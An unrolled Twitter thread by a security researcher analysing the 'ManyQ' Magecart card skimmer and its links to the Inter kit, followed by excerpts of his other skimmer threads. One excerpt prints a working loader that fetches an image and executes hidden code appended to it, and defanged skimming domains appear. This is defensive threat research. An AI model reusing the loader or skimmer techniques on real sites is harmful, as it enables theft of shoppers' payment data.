Share this page!

Eric Brandel Profile picture
Twitter logo
23 Feb, 31 tweets, 10 min read
Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.

Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.

1/30
Going to cover a fair amount of ground here:

- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter

And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.

2/30
Ok, first, here's some source code:

ManyQ Obfuscated: gist.github.com/krautface/ea24…

ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…

This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of this it:


3/30
I'm going to highlight parts of the skimmer, partially out of order. Also, most of these screenshots are from my deob version.

First, it allows the attacker to easily customize it to attack various stores.

4/30 Image
These settings are used to tell the skimmer what fields to look for. It also allows an attacker to target form fields by either name or id. The addressFields also tell the skimmer whether it should look for a select field (dropdown) with the last variable.

5/30
Those settings are used by the processFields function. This function loops through all the form fields passed into it and checks to see if any of them matches one of the 8 paymentFields, or one of the 7 addressFields.

6/30 Image
It does this using 8 nearly identical IF statements for the payment info, and a FOR loop for the address fields, along with more IF statements. Each IF statement attempts to match the details of the field it's examining with the custom settings of the skimmer.

7/30
processFields is called multiple times by the "gatherFields" function. It, surprisingly enough, gathers all the fields up to be examined. It will then call "savePayload" to store the payload as a cookie (if a variable is set.)

8/30 Image
A lot of skimmers have anti-RE techniques in them, and ManyQ has some as well, albeit approaching things from a different way. Instead of trying to detect Chrome Devtools, it's trying to detect if it's being executed outside of a browser.

9/30 Image
The "start" function is the first thing called. It runs the anti-reverse engineering check and then starts a loop that checks the payment form every 500ms by calling the "gatherAndExfil" function.

10/30 Image
"gatherAndExfil" does two things: calls "gatherFields" (described above) and calls "prepareAndExfil". This function is always watching the page to see if four values have been filled: CC #, CVV, Card Holder, Expiration Date.

11/30 Image
If those four values are present, it exfils the data. To prevent itself from exfiltrating the same data multiple times, it creates a simple hash of the value it exfilled and saves that to an array.

12/30 Image
Now, amusingly, this can result in a bunch of exfil attempts if you first fill in your payment info, and then fill out the rest of your billing information. It also stores some of this information as a cookie.

13/30 Image
And that's the major parts of the code. There were some things that were basically no-ops, and other parts that weren't used. This skimmer also supports payment overlays, which this version utilized:

14/30

I've identified 23 domains so far that either have loaded this code onto a victim website, or been used to exfiltrate the data from a victim's website.

15/30

gist.github.com/krautface/b97d…
And, just for fun, here are 23 related skimming domains:

gist.github.com/krautface/7674…

16/30
Ok, now connections to Inter. To start, here's a more recent copy of Inter:

gist.github.com/krautface/af05…

17/30
Inter does a lot of the same things that ManyQ does. In fact, it does all the things that ManyQ does. It watches the page and once the payment information is collected, it exfils immediately. It used to use an md5 to prevent dupes.

18/30
But that changed recently. Previously, it had a function called "calcMD5", but if you look at that copy of Inter I linked above, it is missing, but at the top there is a new "hashCode" function.

19/30 Image
That hashCode function was added to Inter after it appeared in ManyQ. Here is the ManyQ version. It looks a little different, but it computes the same values.

20/30 Image
Next, lets compare the ManyQ "gatherFields" function to the Inter "SaveAllFields" function. Slight difference in that "gatherFields" passes the arrays it captures, where as SaveAllFields loops through them, but very close.

21/30 ImageImage
ManyQ's "processFields" is an improed version of Inter's "SaveParam". The main difference being that the settings for ManyQ are held outside the function and it can handle arrays of fields.

22/30 ImageImage
Before exfil, both skimmers check for four values, in this order and with these names: Number, Holder, Date, CVV:

23/30 ImageImage
And, while there's more, one last example: If you look at "processFields" in ManyQ and "GetCCInfo" in Inter, you'll see that the 8 IF statements in both gather the same 8 bits of data in almost the same exact way.

24/30
So I'd say that leaves three options: 1. ManyQ is a new product of Sochi's, and possibly a new skimming kit. 2. ManyQ is actually just a new version of Inter. 3. Someone ripped of Sochi's code.

25/30
Option 3 is probably the least likely, in my opinion, simply because there has been attackers who have moved from Inter to ManyQ, and reputationally that would be... awkward.

26/30
Example:

jquerylib[.]at in March: Inter urlscan.io/result/389da71…

jquerylib[.]at now: ManyQ urlscan.io/result/86527b8…

27/30
So, that's a lot of tweets. There's more to this skimmer for sure, and if anyone else has already named this thing, please let me know. I'd rather adopt an existing name. "ManyQ" just meant I had "Many Quesitons" about it.

28/30
Also, just figured I'd point out that the variable names in the deobfuscated version of ManyQ are my creation. If you want a pretty clean version of ManyQ that doesn't have any of my names, this is a pretty good one:

gist.github.com/krautface/04a7…

29/30
Oh, and if I got anything wrong, please point it out.

30/30
@threadreaderapp
unroll

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Eric Brandel

Eric Brandel Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @AffableKraut

Eric Brandel Profile picture
28 Aug 20
Thanks to data from @sansecio I think we've found the first digital skimmer/#magecart script to exfil using Telegram. In this thread, I'll go through the code, the drawbacks of this approach, and how to stop it dead (hint: CSP).

1/11
This of course isn't the first digital skimmer to abuse unrelated services to exfil its data. For example, back in June we saw the public disclosure of digital skimmers abusing Google Analytics: sansec.io/research/skimm…

2/x
A prettified version of the script is here: gist.github.com/krautface/c07a…

It's mostly unaltered, but I did redact one bit of information which I'll mention later.

3/x
Read 12 tweets
Eric Brandel Profile picture
6 Feb 20
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
Read 10 tweets
Eric Brandel Profile picture
26 Dec 19
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}

3/5
Read 6 tweets
Eric Brandel Profile picture
17 Dec 19
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets
Eric Brandel Profile picture
27 Aug 19
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Read 12 tweets
Eric Brandel Profile picture
2 Aug 19
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
Read 37 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @AffableKraut has new unrolls!

Check out other threads from @AffableKraut!

Read all threads by @AffableKraut